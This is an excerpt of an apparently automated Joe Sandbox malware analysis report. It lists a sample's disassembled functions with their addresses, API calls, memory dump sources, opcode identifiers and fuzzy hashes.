                                                                                                                                                                                                                                                                                  • Instruction ID: 5b4abcc30fb761a153b4eba849520238d1766886fa933197cb2dbf5d510f84cb
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f497518f3011c90386f56ae0dd19987edc3a4fef3325d72aee3a22fc2e24883
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8D1C666B18AC282EA10AF16ED406F9B3A1FB45BA4F944335DA6E137D4DF3CD451CB20
                                                                                                                                                                                                                                                                                  Function 00007FF72F639080 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF72F6390F0
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 631e051c7e85c708eee405e58e5ac8c33c0e023327227dff62814852cabaa958
                                                                                                                                                                                                                                                                                  • Instruction ID: f5b645d1a92192b0cebd32b2e2c1d8529f4456ccd143611ad7723fa994b73b07
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 631e051c7e85c708eee405e58e5ac8c33c0e023327227dff62814852cabaa958
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0011C33F056A09DF751EBB5EC40ADD77B5FB44358FA0402ADE0C66A48DB349496CB10
                                                                                                                                                                                                                                                                                  Function 00007FF72F5CA420 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @=}
                                                                                                                                                                                                                                                                                  • API String ID: 0-3414626797
                                                                                                                                                                                                                                                                                  • Opcode ID: 3795db95c44060b19ab420451e6778c024f51e6a69577f27822aa931ae8f4db8
                                                                                                                                                                                                                                                                                  • Instruction ID: 9f2e1927091e69977417aa037e23114bf2c81574472adfdce08bc1671d167bfe
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3795db95c44060b19ab420451e6778c024f51e6a69577f27822aa931ae8f4db8
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51C17336F18AC682EA00AF06DC545B8B7A4FB49BA0FD54236D96E43794DF3CE451CB20
                                                                                                                                                                                                                                                                                  Function 00007FF72F5A9430 Relevance: 1.0, Instructions: 971COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 3fa54e4b404b83b64a3ef684d3fa7d9e7b579a293c5d3786dac23140140fd01d
                                                                                                                                                                                                                                                                                  • Instruction ID: 0ee61258ce7b37bbb1c0019c3964bd66274f13a60e7345625193acbd3a77dc92
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fa54e4b404b83b64a3ef684d3fa7d9e7b579a293c5d3786dac23140140fd01d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E82F1B2B1979687EB249B16E9903ADB7A1FB84780F448035DB4E07B84DF3DE560CB40
                                                                                                                                                                                                                                                                                  Function 00007FF72F5D92CE Relevance: .8, Instructions: 844COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: f1e24ba0ba6bef78217b93cc1824f39f4ffccc09ca148982d560d43c4ab6c4d9
                                                                                                                                                                                                                                                                                  • Instruction ID: 8f3c436fdabd55943bae8545840f1935d63876038ef5e54d2e9fd7659f31cb6b
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f1e24ba0ba6bef78217b93cc1824f39f4ffccc09ca148982d560d43c4ab6c4d9
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A829065B0AAC286EB54AF26EC602F9A3A5FF48784FD44136C91D03399DF3DE451CB60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5DBEA0 Relevance: .6, Instructions: 561COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 456757d216aacf14f41c1d1ac0cd8049a835610a21c3933073f91090c7e01898
                                                                                                                                                                                                                                                                                  • Instruction ID: 35685d239c3f0402caeac28b6961f7b3002885173f58233a1d236814833e2629
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 456757d216aacf14f41c1d1ac0cd8049a835610a21c3933073f91090c7e01898
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B942C262B09ACA82EA50EF0AEC446E9B7A1FB45BD0FC14136DA5D87798DF3CD055CB10
                                                                                                                                                                                                                                                                                  Function 00007FF72F5C2D30 Relevance: .5, Instructions: 457COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 58ab2ea6ff0a684350a52622f01339377179222e3f8cb1db98c70cb3a0ab0f85
                                                                                                                                                                                                                                                                                  • Instruction ID: 0ef24aecd6a7bee8630ab1dd740628786e3c0d41c2ef7e1fb79a5c46879e1a3d
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58ab2ea6ff0a684350a52622f01339377179222e3f8cb1db98c70cb3a0ab0f85
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC221622F19FC945D607AB3A98512F5E3A4EF567C4F888332ED4F22761DF2DA0528620
                                                                                                                                                                                                                                                                                  Function 00007FF72F6700E0 Relevance: .4, Instructions: 428COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: e10a91a420f83ef269157d36f9a2c016ddaa9393997882352c17c1d84d133b48
                                                                                                                                                                                                                                                                                  • Instruction ID: 64a85624016217ecc2caddea7e162121cd394faf74728782f635c4d8685dcf60
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e10a91a420f83ef269157d36f9a2c016ddaa9393997882352c17c1d84d133b48
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC029A72B04A918AEB10EF26D8402EC7775FB88B98F509122DE4D53B99DF34D9D1CB60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5DB4F0 Relevance: .4, Instructions: 424COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CounterPerformanceQuery
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2783962273-0
                                                                                                                                                                                                                                                                                  • Opcode ID: af019d92b74d7be67137a52f9c77fda3c993f8b49f31bc8590fea9e3453cb08d
                                                                                                                                                                                                                                                                                  • Instruction ID: b10c84f63dc4ee25f0e1bbaacc03f5aa64b4d4596e46474afbc8f04b17c496e0
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af019d92b74d7be67137a52f9c77fda3c993f8b49f31bc8590fea9e3453cb08d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F02E662B06AC596EA109F16DC407F9B7A2EB45BA4FC54236D92E477D4DF3CE041CB10
                                                                                                                                                                                                                                                                                  Function 00007FF72F5C0360 Relevance: .4, Instructions: 423COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: b68f8225f78dbd7e70b131091e98211d99f4f2d9e2b5582c38477461e06b5bdc
                                                                                                                                                                                                                                                                                  • Instruction ID: 3b90479aed7b6da532f24d9c14ee84b1097d84b46064ac066fb15d943f66209b
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b68f8225f78dbd7e70b131091e98211d99f4f2d9e2b5582c38477461e06b5bdc
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24028E72B09A8686FA149F16DC446F9B761EB45FA4FC48231DA6E877D0CE3CE441CB20
                                                                                                                                                                                                                                                                                  Function 00007FF72F5C8200 Relevance: .4, Instructions: 414COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 02ac5e8acc702e800c044c972fee63d3d4d5d63e4fdd02a0179034e1d588b70a
                                                                                                                                                                                                                                                                                  • Instruction ID: 9d4626073699d421ecd8597662c914d79a36c6e6d03369ff91a3134fb8f0f0b7
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 02ac5e8acc702e800c044c972fee63d3d4d5d63e4fdd02a0179034e1d588b70a
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2F12911F19BCD41E9129A3759017F5D681EF6E7C5E9CDB32E94E36B90EB3CB0818A20
                                                                                                                                                                                                                                                                                  Function 00007FF72F5D91B0 Relevance: .3, Instructions: 326COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 323b4a52389b31af78a198108c136ecd75e8293e50210e2468e6e8b2983b1f89
                                                                                                                                                                                                                                                                                  • Instruction ID: 00d47ed51c26b4c8666922af62fd3ff34c607379eda744c6fab7be3ac8fc4398
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 323b4a52389b31af78a198108c136ecd75e8293e50210e2468e6e8b2983b1f89
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FE1E566B096C586FB10AB26EC446F9B7A1FB49B94FD44232C92E43794CF3CE441CB20
                                                                                                                                                                                                                                                                                  Function 00007FF72F5C4CD9 Relevance: .3, Instructions: 319COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: d78bf327fc7d401db98ee101711161cfb4b90b568116cb42030e1b04918fb35b
                                                                                                                                                                                                                                                                                  • Instruction ID: 1444dd34fb74aee39d53624db37ba319fa5b67e5f1184fb415e7d7c5787e3ded
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d78bf327fc7d401db98ee101711161cfb4b90b568116cb42030e1b04918fb35b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53D1F462B18BC682EA10AF2ADD446F9A361FB54BA4F945331CA6E077D5DF3CE041C760
                                                                                                                                                                                                                                                                                  Function 00007FF72F5D99C3 Relevance: .3, Instructions: 304COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
